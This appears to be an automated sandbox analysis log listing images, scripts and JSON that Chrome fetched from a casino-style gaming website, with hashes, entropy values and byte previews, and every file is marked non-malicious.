                                                      Reputation:low
                                                      Preview:.PNG........IHDR...............^.....PLTE..3.....'........... #'%).,/3259<<@DDGLLPSRSXWZb^_fbgofdykf.rl..}..}..X.u=..G.ZN9$.ioY:.wP0..N..Y..L..Fo~5Xh1IU2:B7AI@HQHQ\PXcY\eZbmdhqonrxvxrs{|{.....................................................................................d0.yE.E).0.d .e0.zb$..r.dK.dpzjy.s..}..................g....O..Z".C..........l..<..6..6../u.$_t.La.;K"2=.%0.-?E1.]8.}.{...~.^ .?:6UO8.W@.iZ.;7.?<.?,.?#.<..8..3..4..Q.j..#h.Ik.?v.CQ.<0.7<.6$.7..1..4.'X.+].!R#!\21u.)k..F..R..M..H..>..;..6..4..4...;.IDATx..{.V.y..{.9_Uq.7.$.....%..d%N.L..#'....Y..?3 ...J..L...Gw.t.3.n.uq:.0..+......d.5..W.!@6..... .H\..;.}...W'_. ..O..vUiI..y..>.........<....".....Q.5..@.u..J. .2?.$6...ti&..T..@z..C.eRd.....1...}..Sc(.CI...F2.l..A5.&.. E....hB.......^S....0.6B.m....&....Q.....p...\.4?.U..].?*......y...4E. ..:3..Y....?.\uv^i.-0H..UL*..c..e...z.E..|.. .....F{8..E8j........eF8.......$r..p.y.+.C..U..T.l.M$.tv.T.....W....I(..e-.&$.Q.yt..4.0@..~.)m..m+U8>=9...
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:gzip compressed data, from Unix, original size modulo 2^32 6977
                                                      Category:downloaded
                                                      Size (bytes):2005
                                                      Entropy (8bit):7.90443492532834
                                                      Encrypted:false
                                                      SSDEEP:48:X8cFaAwZZPIj7IGzFV+XxIFHSoRZ0mrDS0LiLDMsKiZe:scvwDxg+BIF3X0sDdLqKiZe
                                                      MD5:44E5EF5521F4906CF856F7B40DB9D884
                                                      SHA1:C71059493A4984CB9EAF8F8D3ED095844C18B774
                                                      SHA-256:1ABDB7739FB707913C3E96B82345C4FED5CA76CB2FFF98F3090B09ECEE2230BC
                                                      SHA-512:B882762C4ACDC5EE7B29E63D7915301448FD68E09845C8E74F2CA5349A2D0A5E152ED3FE90B8A6A4862AFE83D77D62EB0481DDC236D2ADDBFBE9F4D33DF83A32
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/plus/css/unite/login_modal_unite.css?ver=1726133380
                                                      Preview:...........X[o.E.~n~..P5.Y.v.&.jE.B.....!....=twg....Z.@..U.....@.;(..hK...N....3g....n.i."iR...|.:...d19..k/Z[.;.....`.........Y..W...R.{W...+...nL./1~v.b..!....V......../..k.../~.?....P..vW.X...I....a. ...H..........aQ.4.]"....C.%.BN.Xa.}.]..V......[.\.,..(...../."1...]I.1{.].......lDDHm....<..,\...X$<P\.Z.O...."`.Y(s....`..8.~.............c..6q..s:$.!n.x........v...v..zKm.A9.u.R}U}.6..*h.p.k.-.....H.iE.[.n.........eO.hp ..03.[..bf.B.m..KK.w.O,.......7...?~:~x.......9...7 ..0r..=...zl*m.fc.T.6...h.a4.tQ.Z..VD.>.....,j.............|8jC..C....*E0....).h.v..4....ZMdH..TG..pz..d...F./'h&..&..[:..U...v........8......wv..[..........S.Y*..7N.....jb.Ai>..aF.Jx.p..I4N..k....|#T5.W..!tQ]..>Yug...>.IL...^#3...n..F5z.6F..~(...q...qx.S..lh.S..H .U..-E.x...j...u...9...g.rn.*t.f3.@......2P.%........C....e.)....8...3h-...g.V....h;b=...j...{".-...nl9.....E/.JT...Y .5ue.\.Tq.......U.M.C...F...p!....T...L@D....Y..b3....,_B...Emm.O...<..0..n.".B9.|*1]P1..V
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 185 x 254, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):10801
                                                      Entropy (8bit):7.968705719481044
                                                      Encrypted:false
                                                      SSDEEP:192:NMcaayfRapu7Rp3mcejKdShy16oeCDf2ZP4WIDPSYLkv6ytNh5F4Wo7SzLOjGxW:Gcbygu7uj016oOt49DPfM6ibPP2SnOcW
                                                      MD5:AA6AED3F61B420D5D00F36E88514F994
                                                      SHA1:8C754C08D585D762CAED294F8000F5BA9666F853
                                                      SHA-256:964A8F497845A500919E745DF7BE0B1634DD7CC8828E8E98E888D05FDB7CC3A5
                                                      SHA-512:5936397FC06076368D1D43BE2055C798FB65313EF52B9B8EF2C7989770CEF81D8C7DF7E38939B2DEC6122D05234621CDA9726031E43EB3F7FAC33B20FDC6F2F0
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/common/storage/cms/cms_1051.png?ver=1611754184
                                                      Preview:.PNG........IHDR.............Q.T.....PLTE....PI_s..g[.`U.b\.bV.bV.cW.bV.cW.NG.BB.NG.NG...(%+*+5_s..WM.[P.cW.`T....^R('/.ME.PG.RH.KB.TJ.82!")..#.......H@..{....0,.@:......&*3.........A{u....HC....C<....gW.....&......@.z.46..z.o_3pk.TL........l.ZS@DL.....!d].`Y....wYa..Q....s23;........r...WPSSX.....x.......lf]^c.........GT_LLQ.PK..../]p..[P......&........._U......U..H....._...ve..C...........oV...6....[.7..2p.._.......opt..`...XiwRao.v>...o.."ha..N.QK:;@.. ......=vq..$...$]V....As;l.6.....g.WD.VO....yp.JD...L.}.....!...f..Y...xc!`@..4...q..O|vHjt...+.fij-gb..Y..+i..*....q.pf..)..~...Y..?...A.....>..E..xy~..G..7...2i=1.y..Exh*p`.&..n..0..(.xE.`..=.H5IC/.r.*......-~..O....d...D;.9...(..||~.YW..L..0.....e.....[X@UK.o.O.N..#..!...h.....y{g..fX.e#._..^I.K)xP...i.........l........F0....tRNS.y..#B]......C.k...&.IDATx....P...B...u{..(...N.J..>(.:=...u.......J6Q.:%...P.&..2...z...x..:.r.~..........{..3......B.Ms....xz..!...#.=..W..8C.....C4.a'.7.....&..2.Z.33.6..
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 30 x 32, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):616
                                                      Entropy (8bit):7.444942684961581
                                                      Encrypted:false
                                                      SSDEEP:12:6v/7++pi4MNhsOhfotmXt1tVjq53uO0Ldcfz4SPfsDJC05D9:P+pOtQtm91C+O0LdusSPfsD3
                                                      MD5:D78068AA4F691E86A736D5EC0FA45AEE
                                                      SHA1:30E0842662A7F97B84289FB093C3755B99503E40
                                                      SHA-256:12D00217BBF0BA6959F43B8AD1F5BBD0B9F7B63ECD6BE5650BC91AEF21716097
                                                      SHA-512:A0F5AA3F4C004A5BA147FA4FBE283D1E06448DEED3F11112D8700E6C3AC85B67868962E75D406DFEA5A416F3C69C7D43EE5444E7E7DB242C7C5DCDEFF94841CC
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR....... .....2.8M...BPLTE...___...jjjXXXoootttxxxCCC|||...fffKKKRRR999......000...................tRNS.@..f....IDAT(.u.W.$!.DK......[5........R.`{W...>....l.p..j..T..8j;.x....H..{Tsh.....;^|....-h..r........_.[.........N.. .x....z..yO.7..4...]..K%@.r&..L..r.0:...._...8T$T.0..K.A...-.6.d..i.0....(.E.:Q.!..0..o.yHDI.......8....Fhs..A...).0.<...i#...Sh..I..pN%..c.4,...%.._W..9..]e$........q..Q.s).RW..d..]v...^..|..w...$...._r.[...v5&.D..a..I..B.I`..Nl#q.*.....8h.1T(p..S..E0+.........~..<..i..`"...?.%D_.[Um.._.**AZ..3..].....A.Z...(|{.P*..M%..'.x..}T.._...V...Kj.'....IEND.B`.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 280 x 280, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):2618
                                                      Entropy (8bit):7.533908680560106
                                                      Encrypted:false
                                                      SSDEEP:48:7Vo8mVcITSldAeWlgLp447KOArxgQKInEZLgBTY6:7VPKPSl2lIFuOmWSuLqE6
                                                      MD5:4B953271238020D059C147934029B435
                                                      SHA1:67EDCF1B9DA7410186D7538BBFB4A91278E1A98B
                                                      SHA-256:941086094EB96EE41D2B39153919C7FA7894E4C4444D4A24C581E98761310561
                                                      SHA-512:F3CD3921C8A3D73BD2A122D9562ED186D258C9ED8F9412167A51CC56781817464F3788F2DCAE4B0D1E18BAE885846FDE25A6C6800AD0D1A6C3DC89E86BD44507
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/images_plus/egame/nav/271_egame_logo.png?ver=1605689921
                                                      Preview:.PNG........IHDR..............P......gAMA......a.....sRGB.........PLTE........................................................................................................................................................................#..................0%"...>31...uml.|z...ldbYPNLB?)...K!R.w.$'.A.A;....f"..ag_].....................<1/............................................f...=@...XS..p..............~..........t..t.U.q..)j.l..............~wucZX............oge.......J@=............xw...VMJ.....WNK....zsq...4.....8tRNS....a.!.1.Qn...d..q$i...D.YKwT.....2..,....(...}...9..;....IDATx...C.G...b....". (*j[../DE.j.#..bK.@z.Cj...Z...?.M....6dw3.......vv..evx...M...........................................................j.}-.L.Z.D.P.}Bm....E.Z..k~.oT..;$T.B.W._ZH5..p.|_...Z./.3..K......^..!.]..[.{}.ePo%.2......Es,&i..#Zbu..Y...0......!../...J.qm.4.j.D ...S.g.oc..FB/1.1...B.)...$..4..<.c.......z........-.+t.k;I.Y."..XX.....c`...1.......2fKK.l.1..=.K.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (16994), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):16994
                                                      Entropy (8bit):5.292328836656455
                                                      Encrypted:false
                                                      SSDEEP:384:Rigwo5UpVZG9lOUlgkhzj7FRNE82XyySyTYayWri/SRVRXFKP9nWZcT2Rc8ex51f:RiB8lOuR5wSWrrRVR1KP9WK6Rc8ex/
                                                      MD5:2F9966A615F3F46D846807ADBE42644F
                                                      SHA1:441544C084828DA55CA0BAFDC4C3DF7DC7020820
                                                      SHA-256:BE4D1215EF6F2B2915B7F65CD28B9A9F7DCEF17E1F0D883EDD19400CA0EA795C
                                                      SHA-512:E85F14552C1B5837780990E210223C5D6F532DD55F16589F682D1F2F95ACC540B715AAAC23CE12F871661006F80EC9043A9674DFDEC1C3EFC0819125D492DFF6
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/plus/plugin/js/sweetalert.min.js?ver=1606790105
                                                      Preview:!function(e,t,n){"use strict";!function o(e,t,n){function a(s,l){if(!t[s]){if(!e[s]){var i="function"==typeof require&&require;if(!l&&i)return i(s,!0);if(r)return r(s,!0);var u=new Error("Cannot find module '"+s+"'");throw u.code="MODULE_NOT_FOUND",u}var c=t[s]={exports:{}};e[s][0].call(c.exports,function(t){var n=e[s][1][t];return a(n?n:t)},c,c.exports,o,e,t,n)}return t[s].exports}for(var r="function"==typeof require&&require,s=0;s<n.length;s++)a(n[s]);return a}({1:[function(o,a,r){function s(e){return e&&e.__esModule?e:{"default":e}}Object.defineProperty(r,"__esModule",{value:!0});var l,i,u,c,d=o("./modules/handle-dom"),f=o("./modules/utils"),p=o("./modules/handle-swal-dom"),m=o("./modules/handle-click"),v=o("./modules/handle-key"),y=s(v),b=o("./modules/default-params"),h=s(b),g=o("./modules/set-params"),w=s(g);r["default"]=u=c=function(){function o(e){var t=a;return t[e]===n?h["default"][e]:t[e]}var a=arguments[0];if((0,d.addClass)(t.body,"stop-scrolling"),(0,p.resetInput)(),a===n)r
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 140x250, components 3
                                                      Category:downloaded
                                                      Size (bytes):8547
                                                      Entropy (8bit):7.927998815102047
                                                      Encrypted:false
                                                      SSDEEP:192:wQ6S9HweGbp09jN/JBVSZMQc5cm0pbJl2Lc6nR/XEJyNFRgBU8:b9qV8tJb5J0/l2o6R/QWFX8
                                                      MD5:4EBC390FBE6627D5ACD5EEA5396EE4CA
                                                      SHA1:3DC46AAFEE0F239AB826F1B5E0BF76A7A5CDF372
                                                      SHA-256:DAE503EA40F9FCE5AF2429CA75F89FE74B0DD62E12166DCB04F1A9BAF567C8E2
                                                      SHA-512:18C511476BF19FF35F21273ED8FFF50EDC097D340B8F722597E8EDEAAA454F63BFFE10C4C49857814E4A3FD2CD0BFE91D8EEAD18412B1794ECEE7CC1FDEE0091
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://b45032.com/images_plus/other/en/right3.jpg
                                                      Preview:......Exif..II*.................Ducky.......<......Adobe.d............................................................................................................................................................................................................................................!....1A".Qa2.B#..q.R..bt..7.r3CDd....S.$T5'........................!1.AQa"..q.......2R...B.r.#3............?....@.P(.....@.P(.....@.P(....W.y....gd]..+eK..~)AN.@..(._....PB.@.P(.....Aw..d2s........../."Pz....(.pg7..nfWCc...c..8./.>t.?Q..L.)y&..L.5.Hd.Y1.<,.}..~)....0...|u.D.*j..@N(..1..8...E...*.....S....fG".*...g:9d..y.F4DRG.F..TU.~.....q..[s{Ec..!..d.[U............Mwy[.\..t...7Q....U...d1.p..%...\a...^.b....x.....&....S0!A....f.$rPd..RQ[...z..O@.P(.....A.v.....e...?........|...)..{K.=....#....tQ&e.D..C...>I....&..FOm..M..e.X.;.....<yq.%`G..._RI+......kkA..........y7.Ss-=..h..8...?........s.;.i8..knf..1.[P.jI............V.;?~....6.|.._r.g..*c.{..BQ>!...l.nS.t_.US..
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):20885
                                                      Entropy (8bit):7.9628685702568385
                                                      Encrypted:false
                                                      SSDEEP:384:yCLHZ5VtCMuhtM7xj1OcQZPaJbsMgpUPgz0+U0uvt+pe96WIxj21QTKmqMYanvB:/tLwvP6iQJbBYz0R1F+mIxjQM
                                                      MD5:5422D53213A429DFFDC7534DA8DBDB41
                                                      SHA1:1C020DE2F4CEBA15D2601E73CA70C33871976F61
                                                      SHA-256:64ED64AA905377B09D669089EE9559CF1219A42A0398A2AC5B5A328BC9AEE403
                                                      SHA-512:338C472700A75D5B08A720295743855E35A607C446EEE24FC33C34A3E9FA32C56241107F2E5842AB5ED3F746D9AEA8DEF5DF48F61E2B523E4BC1AE7CE4F6E0FC
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR...............^.....PLTE..<..?..E..H..K..P..T..V..V..d&.u/..S...........o....9_+_aLSnjYVK8..............D.{..C.r5.^(.E..0....E]Rm.{p.....t.............................|.._.F..Y!.c+.g8.x?.=#.;D.z..eu.Cp.8..G..C.........:.6.x............................q..e..V..q.....m..9.....9r.#_.(5.94.QF.uf..u.c.p]._O.UH.K?.....|.dn..y...h..i..[.hO.iy...............g..L../..`..p........c.].r..].[..) '?39F#4(.O"7i,5.-7.B;.Eq.E}.i..v.v..d..p..#..7..B.ZE.'%......p..N..............9..M".]+.r3..@..I..V..Z..~........!..U..D.D..1.?..:..:p....1...i.+N.1.]..m....0..=..M..M..9..&.......X..&\..s.L..|.....y..q..[.xX.gQtXEgB7M74=&')..A1.R:.`E.mN xX%._*.k0.p7.~8..I..N.Y.b.j..s..|..z..f..l?S.Zj.MYm:F_0/\!.R..L&.Y1.`9.j@.pM.tZ&}i7..A...uo.US.R:.Q4.A..>..4..&..(..+../..3..8.@.^..NPIDATx..}..Wy...{w....^..$.cl7.M.$&|)....@.T.!.W......(.....DP>..P.h......B.Q .$.S...I.8.V...f.ql.].;...9:..H}.h....h~z..}...J.e.`a..Fe.).t{ w.g..P..l#?..,d...e... .Z.3..B.....D
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 269 x 79, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):13705
                                                      Entropy (8bit):7.980154201245431
                                                      Encrypted:false
                                                      SSDEEP:384:PDdX3vetX6BohXzVNZMrLQGPoMa5DXqDjeBCl2qRgDcz7RCgbN:bdX3OX5VNsLLov52PqCFWkv
                                                      MD5:8EC219FA20AD12844ED8609277D6F524
                                                      SHA1:B17ED9A34BCFFFD1401AF06C7DFA226D8DD565DB
                                                      SHA-256:BF924CAD503FA932910E1151CE10995F087A88F1AD38B9D47E7D6876A55C6180
                                                      SHA-512:3690F3D0F701C6E39FB390EE1C07D20251811279BE86ECE36FB43BE077F9803FB07FD3D7C5647EF111862F8D60C818800490047352031DCC67F250DEAB7FB4B9
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR.......O......+`.....PLTE......................................................$..*.....I.$T='......aC70....$......A(.....,@."5B'."A]J:%..q(29..*I0.!Eh.9U`<-qPE5$.[G1Y;1...*Mn.x`-8A.#).....S3(...3JZLH8".-Rv`O;:).0..iJ?7.....ePxWJ (...-...#...zhjN5P7.)....kB1....="....nQ...5Yz..x.VD.nd.>d...qh.[N..#-#.....^JK3,U/...zdL.qahVF?31]7"K'.UjsPC?xN;.....p.0QmV=..xjf:,(..bWT..7P:/bG+4*...rO`f~nY.bRwUA..:FM.gGTD/6`...x.(C..o..g..Zq{.wn.k[3@Hr_G""......d.bYpD7..v..ay...z.Aq.w[=PVlC.(+&...}Y8...+Y..}j.v\.sXI;7.-6......p.gZueW8<<./0.......{.4cuP.ledWF>...mYQ.yw,Jck^[.lS..........H.+AV5;4.....~.KxNcqAXe.bBurq.wj.P....9Ih?"....AZ46+9h. ev...Qu......K@C4.........}PXZ..HRF..........o.[4......`...a....Dg..._.z.h=.|.y.........w../....^>C.S..4...........Kf..N..D..O.....e@k...ek......2DIDATx...XSe...u..o.6..... .AE...P.....B n...)T@.x .B\...!H#2-E...Q...J....i..... .8..9.9cpv.o...}...8...\..$.F..(.."). ...&]....xJ..rE*..... ...NC1.LHc..lb...e.s......Dp!<..1
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 700 x 255, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):62478
                                                      Entropy (8bit):7.983174535112712
                                                      Encrypted:false
                                                      SSDEEP:1536:QJGciJ0HAse576G1MR2uW3VWkwl7Q31hSaeUWOPAy:+GrsdrGnu7PwSTUR4y
                                                      MD5:5D6A4C8918A36AB4327A3D2B87F9904D
                                                      SHA1:152CCB077519306951CFB872213F2BF15DBF4DBC
                                                      SHA-256:CD1093860EBC277B890410D37A032144F1FB07EA68109DC7E63DEA672E37F877
                                                      SHA-512:4849710A18E4E9CA52D82F7BC920460EB4B8684F27852764757BC4FA4659D69621FA64C72268B5E76B10FA7008DC67D656D78103C76CD71574C1F3BF79E2D225
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/images_plus/other/banner1.jpg?ver=1606891697
                                                      Preview:.PNG........IHDR.............$7......PLTE....$...........(..../.i.)..........................$........!..-".......)".............>'....3#.............2.&...8$"E)."./...*.... .....:..).....'N)....5.B..9<=;3.-74....&&$0-C:.$ .+W,....2*CPG1(... /a050,*(%...9H?UXYNE&4(.N_U...NOP0A9_aaKYMK(.FED......VdYKD.n{k6k2YQ,w.tc[!d\9sstWN.....<7.W %B.:v8..-...D:1tl?...pg+Zl^WI=.....jjh...}}|.|=.........h=/.....=...[2#....m]S.....'N...xkY.$'..erd.we.2e....WG...P....[.O.....(pYf\O@.=x5.d'....yE4.S....?K....OL......vQE...j..$d..~m.........F.B..x....+0.C".._.G ...M.G..D...B.2RV.......VG.J&.....x._^..5.6....Njo.jY.......#2_.U.m.Y&.vv\..#Bmw.6#2?..Y...1~.]}eov......V....s.h.{....CF]...d[.k'......C.`......2X...l.w>..Q.........\&....,.c..l...J...*......i.l.........y...7....p~..>...h..JW.....}..S..........IDATx..A..0...+...=....N.."..k.......O....2.....qB..,.....=|........Uj..j~..U....qQvFm.ZW.^.B.:...=..C/Q..x=..|F.2...C.....w..O.k..j..0.C`.K|...5|$..7c.~.'.....F4"...Rl...FpQ..
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JSON data
                                                      Category:dropped
                                                      Size (bytes):202
                                                      Entropy (8bit):4.3069982798699185
                                                      Encrypted:false
                                                      SSDEEP:3:x1D3w9xJHvFMHY1S1rz9UzWReHv0DS1JA9cUQHv8GOVKLJY3vEJG3w9MQJMJHv1n:jOvFM418Vav0D83v8mJYfYGC4v1
                                                      MD5:61D2133B3F83A01A2619EC2F30862A99
                                                      SHA1:5C09FE957AF5C761B9B682D62F0CCBF6D09A9499
                                                      SHA-256:F7BF42CEA3BE2A8622DE57570036A38B20B36A24E99E6937C661A11A985E6D87
                                                      SHA-512:CE6C431B772AF0DAEBE967224A45CF598BC28EBF0CFD9B7785E81765D3EAECEA727AB363D4B8B4EC5824DF5F078BFC69F946F0CD17DD39013393A5BFED0F04E7
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:[{"cat_id":801,"cat_name":"Hot","icon":"popular"},{"cat_id":802,"cat_name":"Newest","icon":"new"},{"cat_id":807,"cat_name":"Jackpot","icon":"jackpots"},{"cat_id":"all","cat_name":"all games","icon":""}]
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 280 x 280, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):2874
                                                      Entropy (8bit):7.836975522103957
                                                      Encrypted:false
                                                      SSDEEP:48:fnX85aLddBvzrTS/toRGGWz38An6eWZDH/FpdaZ9gTIoIJvtuKX:fVLd3rTS/hhzmVH/UfgTIosX
                                                      MD5:2078DC1E2CFF31CA25A9B37D9CA46A82
                                                      SHA1:EE84ADC8A708CAA148EDE4B55B6FCD09734E480D
                                                      SHA-256:70AD3C870767A9182D1E2C428A785EB29C917950FBBF93005F0276ABCCB84F11
                                                      SHA-512:D9A4C3392E1185FA425B5DC55D66D4B2D539D370B4B98C8F13FF7794617629634222A187963AEADC1D3200414E1B47DCC9BCE8B0FCC8CDF9E71B97F8F2B4736B
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR..............P......PLTE...,..#..#..(..&..$..)..%..)..(..*..#..+..&..(..'..$..%..&..(..+..)..*..*..)..$..(..(..&..)..)..+..)..&..(..$..*..)..(..+..&..&..&..)..'..+..)..+..(..#..,..(..*..%..(..'..(..&..%..+..&..+..$..$..%..$..$..+..(..)..,..*..#..&..%..)..'..&..+..$..%..'..#..$..'....c....DtRNS...@.@...0 ....@..0..@..p.``.`.......`P..P....P.`..pp......p..[.....IDATx...............................:fq...0<..J..Zn...a[..,.....\ ..:1.r....1.{.!"""""""""""""""""""".......u.d.T..cCz8IJ[..~is...W#L..tzh..K..c.|..t.u.s.h.... "..RI...#.....D.q:.8m.\H:........P.\...|.Bt.)&..>....2..x........f..j....baFX...B.v.c.%..1/..Ya.F...q6.5.x...p.~~c..+L4......-.h3LGA..........0(...D..4.....I1A.K..36.a.V.).^.x...!i....0P.B.[4..7>....z.Ia<..y.Ym..ap...N4.c..0V7..z...z....`.;.....;\...{3)&.d..A.H..(5N..B8..L.RE.P..K..-..oo.0...a8....6.vj..um5M..?hB.J5..H|...h2...r.........s..)[.i.!1.R#...1..-...%.]..8=........v.1hF....!.fP...0..Q.....w[...b..9Rn.Qoap..#
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 280 x 280, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):4626
                                                      Entropy (8bit):7.831077187005751
                                                      Encrypted:false
                                                      SSDEEP:96:cKDBTb4koR/nie92NMOU5aFq8K4Pw7fdEMRkI:cKDx4k4/htag13dEm
                                                      MD5:AF090217EB2AF46470D627A61CF6610F
                                                      SHA1:2FD4092C2C5089548B9DCA769263230D1581B55E
                                                      SHA-256:DF54D45449D3986AC869DEA084622FBC7E00D5ADF477651091AB8F8259586AE1
                                                      SHA-512:B10BD3B2955B5FA9827DF5F66768E910D0D16F47671CF9C2D75C89DD8EF7D5C7C48506F2E1BD7405E4DB980C6C13E76C77DB769809373E9D04EFA80EAC4344F6
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/images_plus/egame/nav/89_egame_logo.png?ver=1699847425
                                                      Preview:.PNG........IHDR..............P.....5PLTE....#.#.#.#.#.#.#.#.#.#.#....#....#.#.#.#.#.#.#.#.#....#.#....#.#.#.#.#.#.#.#....#....#.#.#..........#.#.#.#.#.#.#.#..........#.#.......#....#....#.......#.#.......#.#..........#...................#..........#....#.......#.#..........#.#....#.#....6fR...etRNS.........<...B....6..j.Y.......xRM)...|o;"...qd`VH2,..%.......J-".~n....R...a.t[.B....fF..0O......'IDATx....j*A.....F.Y.8%..P.H@D0`....E$....uHL.e.7wcU}[{u...u.).i..i..i..i.vub.*..DJ..4.$g..H......A..F..........&....>.[Cs.&4a`l.2.....00F.....Q..+C.y...a... ^F..J.M.?f...P..D.......Q.C&p..*.'*t.....m...Nv.b.}.RH..+.-..x.B.tI.!..F.*).m..>I.r...n..|R..\%.z....q.T..n.^9x,.3.RZ..x...d+....\...C-ize......Z^.3..{.j..>}2.....4..d>.....a...(.EHP ./d............Eq.$.w..w$.]....b".#...a/KR.#dy..#3HA.G...;/...;...2M..K.>..y..."m~..cpkR$.........X...>)..FW.. a.].C.Bv.@G...9.LN....**...6..A..s.....@.......%.........
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):27717
                                                      Entropy (8bit):7.985507739175344
                                                      Encrypted:false
                                                      SSDEEP:384:UGsHrgHdxIX3P1jv8Dd2hOq5gG8mBJyLAN4N7lgtMcKRmN5XKMW8f0vUu0mHj+mY:UnLQdaXfd8D0L5txu7GtWmz6MYDmOU
                                                      MD5:64E9054CF014D05159260919646D8B40
                                                      SHA1:535F771A80173D0612CF3F554C4865022F31A210
                                                      SHA-256:C6FCD169E16A7DDBFFB416B2CA5C4EDA8817880790F03FFA344ADA2C93C1C42D
                                                      SHA-512:BB2FF96CD5C747036FD551E4CF2562C24454FB0F250A3E05642D554917F720537438FE467D706083965D92700E777F93925BAAEA18F71F4B96B9129A7A5DBCA2
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR...............^.....gAMA......a.....sRGB.........PLTE6.$X..S+-7.!@.+F.#2.%/.$3..8.(,%&?../..*..="$,..R.'\!.e(&.....#I.,1..]$,G)*x8%.."&..5..k4)b3.f.....E...S8...P,.c2m*.Q..L..^7*.@'S4%..?....X-.V.K..Ax@2.F.m8.F..z..~&.'?".w)'#..G3=.55.G4.v8y/4.{..ri....E$R.7I,..wu.>Pp.,.2iD2.j..."..=.5D..rA....Y*.......X..!.-D%m~.!..\..e..b3;ZJA.)...<00....X..q..m.../!0...M<.....OgWSO .0.S.....F.8d.H9..T....vY6k:....pU....?u....'.D....b G...^. .nJ._..[Bc.A.&.)U..u$./.1...s.a.e.`.{A.T=8.K.....u.O..^..1.m.M.s.{.d.{H.[?...eE..a..hyeRyOD..C%....:./9.oQ..t.I.c....+.e....T.77.L_.fe..9.}.....+.'v..M.0..-..3U....m.4.....%/..AW~.p.tkl....UH.WN.... ....?.n5..1.....b4..3W.....`=g.C..3...[..T.9...>J^.....id..r8...Va06ENne.......x..}h.?...........u.\p.m.....<].I..U........v8.y..AH8eB..Veq.U.x_..A^..../r.... .IDATx.d..X.g..M@,..$..@...%.!...$D)J ........#".IA\....4b..D..E..T@,:Z\..RK.Z..8Z..:....7.y^w.v.3..x....^.....;.e.}......A...?.s.|=.._.v..8..'...?...Y.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:HTML document, Unicode text, UTF-8 text
                                                      Category:downloaded
                                                      Size (bytes):12444
                                                      Entropy (8bit):4.462394055562315
                                                      Encrypted:false
                                                      SSDEEP:192:7Wa+quJJuwcd/6K4Ji7LuJw7nw19hJgeLyOq7wbyG1oiHgWrGJomSb+y:7W63diJdRgI
                                                      MD5:FA6D861EB77FE21E9DACF09EB1D842F4
                                                      SHA1:98D475B22D5372C4078CB0B1870EAC5CFA077BF2
                                                      SHA-256:C860298D58109FEB82B3333B0CD22B8D939F9E7EB249656D492593A72AAD1D9F
                                                      SHA-512:5F1D61B045484DC066E7F5DF69FDA1546E6CD494BB0FBB93D2BCBB648792A8CD192CDA1E254BBC4D3CEF3F3F4277BB848AC6E247580632F41A9506CD4A4043C7
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/plus/js/unite/egame_unite.js?ver=1723802385
                                                      Preview:var favorite=[];.var time_jackpot;.var gamename_sreach='';.var egame_unite ={. callback_game_cat:'',. getcatlist:function(platform,egame_filter){. $.get('/getcatlist/'+platform,'',function(obj){. var str='';. $.each(obj,function(k,v){. str+='\. <li data-catid="'+v.cat_id+'">\. <div class="icon" title="'+v.cat_name+'"></div><span>'+v.cat_name+'</span>\. </li>';. }). $('#game_cat').html(str);. $('#game_cat li').click(function(){. $('#game_cat li').removeClass('active');. $(this).addClass('active');. let catid =$(this).data('catid');. if(egame_filter != 1){. $(".filter_ul input").each(function(){. $(this).prop("checked",false);. }). if(catid != 'all'){. $("input[name='cates'][value='"+catid+"']").prop("checked", true);. }. $("input[name='pfs'
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 700 x 460, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):69232
                                                      Entropy (8bit):7.943639463631204
                                                      Encrypted:false
